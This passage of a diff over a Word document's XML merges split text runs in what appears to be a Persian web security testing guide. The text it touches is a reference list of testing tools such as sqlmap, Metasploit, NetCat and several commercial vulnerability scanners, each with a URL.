-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Damele</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and Daniele </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Bellucci</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>sqlmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, a blind SQL injection tool - http://sqlmap.sourceforge.net</w:t>
+        <w:t>Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool - http://sqlmap.sourceforge.net</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26308,27 +25979,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Absinthe 1.1 (formerly </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>SQLSqueal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>) - http://www.0x90.org/releases/absinthe/</w:t>
+        <w:t>Absinthe 1.1 (formerly SQLSqueal) - http://www.0x90.org/releases/absinthe/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26345,7 +25996,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -26353,17 +26003,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>SQLInjector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.databasesecurity.com/sql-injector.htm</w:t>
+        <w:t>SQLInjector - http://www.databasesecurity.com/sql-injector.htm</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26387,7 +26027,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>bsqlbf-1.2-th - http://www.514.es</w:t>
       </w:r>
     </w:p>
@@ -26512,7 +26151,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -26520,17 +26158,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Foundstone</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SSL Digger - http://www.foundstone.com/resources/proddesc/ssldigger.htm</w:t>
+        <w:t>Foundstone SSL Digger - http://www.foundstone.com/resources/proddesc/ssldigger.htm</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26677,6 +26305,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Testing for HTTP Methods</w:t>
       </w:r>
     </w:p>
@@ -26694,7 +26323,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -26702,17 +26330,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>NetCat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.vulnwatch.org/netcat</w:t>
+        <w:t>NetCat - http://www.vulnwatch.org/netcat</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26754,7 +26372,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -26762,17 +26379,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>OllyDbg</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.ollydbg.de</w:t>
+        <w:t>OllyDbg - http://www.ollydbg.de</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26836,27 +26443,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>fuzzer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> framework that can be used to explore vulnerabilities and perform length testing</w:t>
+        <w:t>A fuzzer framework that can be used to explore vulnerabilities and perform length testing</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26917,7 +26504,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -26925,17 +26511,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.metasploit.com/projects/Framework/</w:t>
+        <w:t>Metasploit - http://www.metasploit.com/projects/Framework/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26971,7 +26547,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -26983,7 +26558,6 @@
         </w:rPr>
         <w:t>Fuzzer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26999,7 +26573,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -27009,7 +26582,6 @@
         </w:rPr>
         <w:t>WSFuzzer</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -27051,7 +26623,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -27059,37 +26630,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Foundstone</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Sitedigger</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Google cached fault-finding) - http://www.foundstone.com/resources/proddesc/sitedigger.htm</w:t>
+        <w:t>Foundstone Sitedigger (Google cached fault-finding) - http://www.foundstone.com/resources/proddesc/sitedigger.htm</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27232,7 +26773,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Typhon - http://www.ngssoftware.com/products/internet-security/ngs-typhon.php</w:t>
       </w:r>
     </w:p>
@@ -27250,7 +26790,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27258,17 +26797,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>NGSSQuirreL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.ngssoftware.com/products/database-security/</w:t>
+        <w:t>NGSSQuirreL - http://www.ngssoftware.com/products/database-security/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27285,7 +26814,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27293,37 +26821,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Watchfire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>AppScan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.watchfire.com</w:t>
+        <w:t>Watchfire AppScan - http://www.watchfire.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27340,7 +26838,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27348,17 +26845,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Cenzic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Hailstorm - http://www.cenzic.com/products_services/cenzic_hailstorm.php</w:t>
+        <w:t>Cenzic Hailstorm - http://www.cenzic.com/products_services/cenzic_hailstorm.php</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27382,27 +26869,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">SPI Dynamics </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>WebInspect</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.spidynamics.com</w:t>
+        <w:t>SPI Dynamics WebInspect - http://www.spidynamics.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27443,7 +26910,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27451,17 +26917,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Acunetix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Web Vulnerability Scanner - http://www.acunetix.com</w:t>
+        <w:t>Acunetix Web Vulnerability Scanner - http://www.acunetix.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27478,7 +26934,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27486,17 +26941,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>ScanDo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.kavado.com</w:t>
+        <w:t>ScanDo - http://www.kavado.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27513,7 +26958,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27521,17 +26965,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>WebSleuth</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.sandsprite.com</w:t>
+        <w:t>WebSleuth - http://www.sandsprite.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27555,27 +26989,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">NT Objectives </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>NTOSpider</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.ntobjectives.com/products/ntospider.php</w:t>
+        <w:t>NT Objectives NTOSpider - http://www.ntobjectives.com/products/ntospider.php</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27616,7 +27030,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27624,17 +27037,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Sandsprite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Web Sleuth - http://sandsprite.com/Sleuth/</w:t>
+        <w:t>Sandsprite Web Sleuth - http://sandsprite.com/Sleuth/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27651,7 +27054,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27659,17 +27061,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>MaxPatrol</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Security Scanner - http://www.maxpatrol.com</w:t>
+        <w:t>MaxPatrol Security Scanner - http://www.maxpatrol.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27686,7 +27078,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27694,37 +27085,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Ecyware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>GreenBlue</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Inspector - http://www.ecyware.com</w:t>
+        <w:t>Ecyware GreenBlue Inspector - http://www.ecyware.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27741,7 +27102,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27749,37 +27109,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Parasoft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>WebKing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (more QA-type tool)</w:t>
+        <w:t>Parasoft WebKing (more QA-type tool)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27796,7 +27126,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -27804,17 +27133,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>MatriXay</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.dbappsecurity.com</w:t>
+        <w:t>MatriXay - http://www.dbappsecurity.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27880,6 +27199,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">آنالیزور های </w:t>
       </w:r>
       <w:r>
@@ -27983,7 +27303,6 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
@@ -27991,17 +27310,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>FlawFinder</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.dwheeler.com/flawfinder</w:t>
+        <w:t>FlawFinder - http://www.dwheeler.com/flawfinder</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -28025,19 +27334,8 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Microsoft’s </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
